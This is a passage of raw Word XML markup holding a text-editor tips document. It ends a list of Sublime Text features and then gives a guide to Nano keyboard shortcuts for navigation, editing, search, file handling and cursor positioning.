    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🛠️ 7. Split editing / layout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Under View &gt; Layout, you can split the editor into multiple panes (vertical, horizontal, grid) to work on several files side by side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔧 8. Settings (JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can edit Preferences &gt; Settings directly in JSON, giving you fine-grained control over how Sublime behaves (like tab width, rulers, word wrap).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🌐 9. Regex search / replace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+F for find, Ctrl+H for replace, and enable the .* button to use regex in your searches — super handy for advanced editing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔥 10. Minimap (code overview)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the right-hand side, you get a mini view of your whole file — drag it to quickly jump around large scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F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F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_caujm93ad7ij" w:id="475"/>
      <w:bookmarkEnd w:id="475"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F7">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's a guide to commonly used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nano shortcuts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to help you efficiently navigate, edit, and manage text files in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F8">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Navigation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Move to the beginning of the current line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + E</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Move to the end of the current line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Y</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Scroll up one screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + V</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Scroll down one screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F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4FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Undo and Redo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003500">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Undo the last action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003501">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1132"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + E</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Redo the last undone action.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Editing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003504">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes the character under the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cuts (deletes) the entire line where the cursor is located.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003506">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + J</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Justifies (reformats) the current paragraph.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003507">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Opens a spellchecker (if installed).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search and Replace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search for text. After entering the search term,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350C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeat the last search.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">**Ctrl + **: Search and replace text. Enter the search term, press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then enter the replacement term.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003510">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003511">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Save (Write Out) the current file. You'll be prompted for a filename.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003512">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Exit Nano. You'll be prompted to save changes if unsaved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Insert another file into the current file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351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15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003516">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cursor Positioning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + _</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Go to a specific line and column. Enter the line number, press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then enter the column number.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003518">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
